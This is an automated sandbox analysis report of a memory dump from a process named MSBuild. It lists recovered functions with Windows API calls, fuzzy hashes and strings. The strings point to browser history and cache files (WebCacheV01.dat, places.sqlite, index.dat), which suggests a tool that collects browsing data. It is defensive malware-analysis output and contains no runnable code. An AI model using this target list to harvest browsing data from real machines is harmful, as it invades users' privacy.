Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memcmp
String ID: @ $SQLite format 3
API String ID: 1475443563-3708268960
Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88

Function 00414C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4

memset.MSVCRT ref: 00414C87
RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
wcscpy.MSVCRT ref: 00414CFC

Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: AddressCloseProcVersionmemsetwcscpy
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
API String ID: 2705122986-2036018995
Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE

Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 004110FD
qsort.MSVCRT ref: 004111A7

Strings

/sort, xrefs: 004110F8
/nosort, xrefs: 0041115D

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: _wcsicmpqsort
String ID: /nosort$/sort
API String ID: 1579243037-1578091866
Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A

Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040E60F
memset.MSVCRT ref: 0040E629

Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55

Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C

Strings

Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memsetwcslen$AttributesFilewcscatwcscpy
String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
API String ID: 3354267031-2114579845
Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998

Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
SizeofResource.KERNEL32(?,00000000), ref: 004148D4
LoadResource.KERNEL32(?,00000000), ref: 004148E4
LockResource.KERNEL32(00000000), ref: 004148EF

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688

Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0043AA3D
memset.MSVCRT ref: 0043AE4A

Strings

only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memset
String ID: only a single result allowed for a SELECT that is part of an expression
API String ID: 2221118986-1725073988
Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96

Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
DeleteObject.GDI32(00000000), ref: 004125E7

Strings

r!A, xrefs: 004125BD

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ??3@DeleteObject
String ID: r!A
API String ID: 1103273653-628097481
Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19

Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49

Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON

Download Yara Rule

APIs

Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D

memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5

Strings

8, xrefs: 00444B72
$, xrefs: 00444B80

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: AddressProc$memcmp
String ID: $$8
API String ID: 2808797137-435121686
Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69

Function 00430737 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 94COMMON

Download Yara Rule

Strings

duplicate column name: %s, xrefs: 004307FE
too many columns on %s, xrefs: 00430763

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID:
String ID: duplicate column name: %s$too many columns on %s
API String ID: 0-1445880494
Opcode ID: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
Opcode Fuzzy Hash: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99

Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E

CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582

Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC

DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA

Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
String ID:
API String ID: 1979745280-0
Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58

Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70

memset.MSVCRT ref: 00403A55

Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55

Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C

Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F

Strings

history.dat, xrefs: 00403A5E
places.sqlite, xrefs: 00403A9E

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
String ID: history.dat$places.sqlite
API String ID: 2641622041-467022611
Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69

Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8

ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
GetLastError.KERNEL32 ref: 00417627

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ErrorLast$File$PointerRead
String ID:
API String ID: 839530781-0
Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA

Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

Strings

index.dat, xrefs: 0040C237
*.*, xrefs: 0040C1FE

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: FileFindFirst
String ID: *.*$index.dat
API String ID: 1974802433-2863569691
Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A

Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
GetLastError.KERNEL32 ref: 004175A2
GetLastError.KERNEL32 ref: 004175A8

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8

Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665

Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: Temp$DirectoryFileNamePathWindows
String ID:
API String ID: 1125800050-0
Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8

Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 004175D0
CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9

Strings

}A, xrefs: 004175B9

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: CloseHandleSleep
String ID: }A
API String ID: 252777609-2138825249
Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524

Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00409A10
memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
free.MSVCRT ref: 00409A31

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: freemallocmemcpy
String ID:
API String ID: 3056473165-0
Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58

Function 00415320 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00415333

Strings

failed memory resize %u to %u bytes, xrefs: 00415358

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: realloc
String ID: failed memory resize %u to %u bytes
API String ID: 471065373-2134078882
Opcode ID: e5ae129d454b891eada76ccbfa458d0a6592737a0e8831e28bd7d44ced5f0510
Instruction ID: af22f86c8d97814ed0bf188a45fefa7fc909daabc8cee38fca791e75313f3e85
Opcode Fuzzy Hash: e5ae129d454b891eada76ccbfa458d0a6592737a0e8831e28bd7d44ced5f0510
Instruction Fuzzy Hash: 49F027B3A01605A7D2109A55DC418CBF3DCDFC4655B06082FF998D3201E168E88083B6

Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON

Download Yara Rule

Strings

d, xrefs: 0043752F

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A

Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041EF80

Strings

BINARY, xrefs: 0041EEDE

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memset
String ID: BINARY
API String ID: 2221118986-907554435
Opcode ID: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
Opcode Fuzzy Hash: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9

Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 004126DB

Strings

/stext, xrefs: 004126D6

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: _wcsicmp
String ID: /stext
API String ID: 2081463915-3817206916
Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95

Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON

Download Yara Rule

APIs

Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5

GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44

Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8

Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306

Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88

CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98

Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
String ID:
API String ID: 2445788494-0
Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
